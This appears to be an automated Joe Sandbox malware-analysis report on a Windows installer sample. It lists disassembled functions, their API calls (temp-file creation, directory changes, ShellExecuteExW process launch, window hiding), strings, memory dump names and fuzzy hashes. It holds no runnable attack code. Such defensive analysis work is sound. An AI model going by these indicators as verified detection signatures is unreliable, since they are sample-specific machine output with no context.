Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040605E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6), ref: 00406079

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406045
nsa, xrefs: 0040604D

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405EA9
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AB7

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 1892508949-3291747264
Opcode ID: cf48e78cf18fb2c53abcdbd1c73633e89cd3f4632428b8033e9ed2494124727c
Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
Opcode Fuzzy Hash: cf48e78cf18fb2c53abcdbd1c73633e89cd3f4632428b8033e9ed2494124727c
Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E

Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45

Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45

Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05

Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45

Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45

Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45

Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45

Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(006FA6D0), ref: 00401C10
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22

Strings

open, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Global$AllocFree
String ID: open
API String ID: 3394109436-2758837156
Opcode ID: ff3bb4655904d23a68ad57a57f0e6bb41085ff7925529a3d00b9d3c0a0b9f2d6
Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
Opcode Fuzzy Hash: ff3bb4655904d23a68ad57a57f0e6bb41085ff7925529a3d00b9d3c0a0b9f2d6
Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D

Function 00401F17 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00405B47: ShellExecuteExW.SHELL32(?), ref: 00405B56

Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Strings

@, xrefs: 00401F8F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6F

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 165873841-3426815298
Opcode ID: b8275aa830dd6ac0674c89933b07883deb737523d4cce50d92976ee6336c10c3
Instruction ID: 03637a129ab95ddc499dee3230b5434bcfd115e463ad3160f2db423ce5d2e87e
Opcode Fuzzy Hash: b8275aa830dd6ac0674c89933b07883deb737523d4cce50d92976ee6336c10c3
Instruction Fuzzy Hash: 09112B71A042189ADB50EFB9CA49B8DB6F0AF14308F20457FE505F72D2DBBC89459F18

Function 004069C0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069E6
GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
Instruction ID: f1848df8738bec86e5a9e013d2d1160024fdc01f5a204198474b6b1514677e65
Opcode Fuzzy Hash: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
Instruction Fuzzy Hash: CCE09272600218BBDB009B54CD02E9E7B6ADB44704F100033BA05B6190C6B19E62DB94

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C

Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F01
EnableWindow.USER32(00000000,00000000), ref: 00401F0C

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: c4c1b4cea8914b2dd6fa0ad03ebc8abb8926bacf96e52e223fd2b358d8c96aea
Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
Opcode Fuzzy Hash: c4c1b4cea8914b2dd6fa0ad03ebc8abb8926bacf96e52e223fd2b358d8c96aea
